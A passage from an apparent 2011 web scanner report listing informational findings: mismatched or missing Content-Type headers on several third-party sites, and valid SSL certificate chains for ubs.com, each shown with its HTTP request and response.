...[SNIP]...

23. Content type incorrectly stated
There are 14 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly, analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results and, if the content contains any user-controllable data, may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


23.1. http://seg.sharethis.com/socialOptimization.ps.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://seg.sharethis.com
Path:   /socialOptimization.ps.js

Issue detail

The response contains the following Content-type statement:

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /socialOptimization.ps.js?campaign=RT-microsoft_ie9 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Wed, 06 Jul 2011 15:39:03 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Content-Length: 1396

(function(){

var __stPublisher='';var __stCampaign='RT-microsoft_ie9';
function createRetargetSegmentFrame(){
   var segmentFrame=null;
   try {
       segmentframe = document.createElement('<iframe name="str
...[SNIP]...

23.2. http://urls.api.twitter.com/1/urls/count.json

Summary

Severity:   Information
Confidence:   Firm
Host:   http://urls.api.twitter.com
Path:   /1/urls/count.json

Issue detail

The response contains the following Content-type statement:

The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /1/urls/count.json HTTP/1.1
Host: urls.api.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "6599c6d212c5eb6e41d800b7f8bf7397:1284511129"
Last-Modified: Wed, 15 Sep 2010 00:38:49 GMT
Accept-Ranges: bytes
Content-Length: 95
Content-Type: text/plain
Date: Wed, 06 Jul 2011 14:07:26 GMT
Connection: close
X-N: S

twttr.receiveCount({"errors":[{"code":48,"message":"Unable to access URL counting services"}]})

23.3. http://watson.microsoft.com/StageOne/Generic/AppHangB1/iexplore_exe/9_0_8112_16421/4d76255d/2a83/6144.htm

Summary

Severity:   Information
Confidence:   Firm
Host:   http://watson.microsoft.com
Path:   /StageOne/Generic/AppHangB1/iexplore_exe/9_0_8112_16421/4d76255d/2a83/6144.htm

Issue detail

The response contains the following Content-type statement:

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /StageOne/Generic/AppHangB1/iexplore_exe/9_0_8112_16421/4d76255d/2a83/6144.htm?LCID=1033&OS=6.1.7600.2.00030110.0.0.7.16385&SR6=0&SR5=0&SR4=0&SR3=0&SR2=0&SR1=2&SM=Xen&SPN=HVM%20domU&BV=3.4.2&MID=02B561F5-F97B-4B2F-ADF4-C485C85915EF HTTP/1.1
User-Agent: MSDW
Proxy-Connection: Keep-Alive
Host: watson.microsoft.com

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 05 Jul 2011 06:05:21 GMT
Accept-Ranges: bytes
ETag: "0bcb385d93acc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:18:13 GMT
Content-Length: 46

Bucket=1783942133
BucketTable=5
Response=1

23.4. http://www.cadence.com/_layouts/_cdn_js_lib/js_banners.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cadence.com
Path:   /_layouts/_cdn_js_lib/js_banners.js

Issue detail

The response contains the following Content-type statement:

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /_layouts/_cdn_js_lib/js_banners.js HTTP/1.1
Host: www.cadence.com
Proxy-Connection: keep-alive
Referer: http://www.cadence.com/us/pages/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600, no-check
Content-Length: 17754
Content-Type: application/x-javascript
Content-Location: http://www.cadence.com/_layouts/_cdn_js_lib/js_banners.js
Last-Modified: Fri, 03 Jun 2011 00:05:09 GMT
Accept-Ranges: bytes
ETag: "802896e68121cc1:2a8"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 07 Jul 2011 00:00:24 GMT

..d.o.c.u.m.e.n.t...w.r.i.t.e.(.".<.M.E.T.A. .H.T.T.P.-.E.Q.U.I.V.=.'.P.r.a.g.m.a.'. .C.O.N.T.E.N.T.=.'.n.o.-.c.a.c.h.e.'.>.".).;..
././.h.a.s.h. .c.l.a.s.s..
.f.u.n.c.t.i.o.n. .H.a.s.h.(.)..
.{..
...[SNIP]...

23.5. http://www.cadence.com/_layouts/_cdn_js_lib/js_library.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cadence.com
Path:   /_layouts/_cdn_js_lib/js_library.js

Issue detail

The response contains the following Content-type statement:

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /_layouts/_cdn_js_lib/js_library.js HTTP/1.1
Host: www.cadence.com
Proxy-Connection: keep-alive
Referer: http://www.cadence.com/us/pages/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600, no-check
Content-Length: 33010
Content-Type: application/x-javascript
Content-Location: http://www.cadence.com/_layouts/_cdn_js_lib/js_library.js
Last-Modified: Wed, 03 Nov 2010 22:35:02 GMT
Accept-Ranges: bytes
ETag: "02f9a5aa77bcb1:2a8"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 07 Jul 2011 00:00:23 GMT

.././.o.p.e.n. .o.n.-.d.e.m.a.n.d. .v.i.d.e.o..
.f.u.n.c.t.i.o.n. .p.l.a.y.V.i.d.e.o.(.p.a.g.e.U.R.L.). ..
.{..
.    .v.a.r. .c.a.d.e.n.c.e.=.w.i.n.d.o.w...o.p.e.n.(.p.a.g.e.U.R.L.,.'.'.,.'.w.i.d.t.h.
...[SNIP]...

23.6. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The response contains the following Content-type statement:

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /extern/login_status.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.45.44
Connection: close
Date: Wed, 06 Jul 2011 14:07:35 GMT
Content-Length: 22

Invalid Application ID

23.7. http://www.masshightech.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.masshightech.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: www.masshightech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:12:47 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 08 Jul 2008 20:19:59 GMT
Accept-Ranges: bytes
Cteonnt-Length: 3638
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: NSC_xxx.nbttijhiufdi.dpn-wtfsw=e243cf7e3660;expires=Wed, 06-Jul-11 14:24:56 GMT;path=/
Cache-Control: private
Content-Length: 3638

..............h...&... ..............(....... ...........@.............................).......c..m............J...J..}....s..}!...........9.......9......y........!...1...k.......B..............y....
...[SNIP]...

23.8. http://www.masshightech.com/tech-news-widget/parser/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.masshightech.com
Path:   /tech-news-widget/parser/

Issue detail

The response contains the following Content-type statement:

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /tech-news-widget/parser/?limit=5&feedName=mass_high_tech&feed=http://www.masshightech.com/rss.html&callback=jsonp1309960847664&_=1309960851255 HTTP/1.1
Host: www.masshightech.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx.nbttijhiufdi.dpn-wtfsw=e243cf7e3660

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:00:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Content-Length: 2317
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: NSC_xxx.nbttijhiufdi.dpn-wtfsw=e243cf7e3660;expires=Wed, 06-Jul-11 14:13:00 GMT;path=/

jsonp1309960847664({"items":[{"title":"Precision Biopsy closes $2.5M funding","link":"http:\/\/www.masshightech.com\/stories\/2011\/07\/04\/daily17-Precision-Biopsy-closes-25M-funding.html","publishDa
...[SNIP]...

23.9. http://www.mister-wong.com/index.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mister-wong.com
Path:   /index.php

Issue detail

The response contains the following Content-type statement:

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /index.php HTTP/1.1
Host: www.mister-wong.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx
Date: Wed, 06 Jul 2011 11:21:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Status: 503 Service Temporarily Unavailable
Vary: Accept-Encoding
Content-Length: 380

<center>
       <div style="padding: 10px; margin-top: 100px; border: 4px solid #CC0000; width: 500px; font-family: verdana; font-size: 12px;">
       <strong>Oops, there was an error</strong><br />Somewhere a
...[SNIP]...

23.10. http://www.tudou.com/v/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tudou.com
Path:   /v/

Issue detail

The response contains the following Content-type statement:

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /v/ HTTP/1.1
Host: www.tudou.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: tws0.3
Date: Wed, 06 Jul 2011 14:04:04 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tudou=07290da15c4a46bcc3b820765334a527; path=/; domain=.tudou.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 13738

357c
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-CN" dir="ltr">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=gbk"/>
   <meta http-equiv="Content-Language" content="zh-CN" />
...[SNIP]...

23.11. http://www.websitealive8.com/1245/Visitor/vTracker_v2.asp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.websitealive8.com
Path:   /1245/Visitor/vTracker_v2.asp

Issue detail

The response contains the following Content-type statement:

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /1245/Visitor/vTracker_v2.asp?websiteid=0&groupid=1245 HTTP/1.1
Host: www.websitealive8.com
Proxy-Connection: keep-alive
Referer: http://www.metricstream.com/library/Library_5.jsp?prob=Compliance%20Management
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCADASDBS=ANOCIOEDOGMMJDHEPBCFJNDG

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:03:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: no-store, must-revalidate, private
Pragma: no-cache
P3P: CP="NOI DSP COR CURa OUR NOR"
Content-Length: 7795
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Cache-control: private


var embed_departmentid = '0';


// keep on page
function URLEncode(plaintext)
{
   // The Javascript escape and unescape functions do not correspond
   // with what browsers actually do...
   va
...[SNIP]...

23.12. http://zune.net/en-US/bottom.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://zune.net
Path:   /en-US/bottom.png

Issue detail

The response contains the following Content-type statement:

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /en-US/bottom.png HTTP/1.1
Host: zune.net
Proxy-Connection: keep-alive
Referer: http://zune.net/en-US/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EXPUID=dcc9a7e6-6804-4906-b5d8-7b37c2f999d3; lastCulture=en-US; defCulture=en-US

Response

HTTP/1.1 404 Not Found
Date: Wed, 06 Jul 2011 11:18:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S103
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 20

404 - Page not found

23.13. http://zune.net/en-US/top.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://zune.net
Path:   /en-US/top.png

Issue detail

The response contains the following Content-type statement:

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /en-US/top.png HTTP/1.1
Host: zune.net
Proxy-Connection: keep-alive
Referer: http://zune.net/en-US/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EXPUID=dcc9a7e6-6804-4906-b5d8-7b37c2f999d3; lastCulture=en-US; defCulture=en-US

Response

HTTP/1.1 404 Not Found
Date: Wed, 06 Jul 2011 11:18:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S502
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 20

404 - Page not found

23.14. http://zune.net/xml/Carousel.xml

Summary

Severity:   Information
Confidence:   Firm
Host:   http://zune.net
Path:   /xml/Carousel.xml

Issue detail

The response contains the following Content-type statement:

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /xml/Carousel.xml HTTP/1.1
Host: zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 06 Jul 2011 13:57:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S104
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 20

404 - Page not found

24. Content type is not specified

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /submit

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results and, if the content contains any user-controllable data, may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /submit?url=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&title=presspass controls - Microsoft Search HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Length: 1344
Date: Wed, 06 Jul 2011 11:21:19 GMT
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html>
<html>
<head>
<title>StumbleUpon &mdash; Looks like there's a problem.</title>
<style type="text/css">
body {background:#F6FAFF;margin:0;padding:0;color:#645F5F;font-family:Ari
...[SNIP]...

25. SSL certificate
There are 2 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



25.1. https://www.ubs.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ubs.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.ubs.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Thu May 05 19:00:00 CDT 2011
Valid to:  Wed May 29 18:59:59 CDT 2013

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Certificate chain #4

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

25.2. https://www2.ubs.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www2.ubs.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Thu May 05 19:00:00 CDT 2011
Valid to:  Wed May 29 18:59:59 CDT 2013

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Certificate chain #4

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028
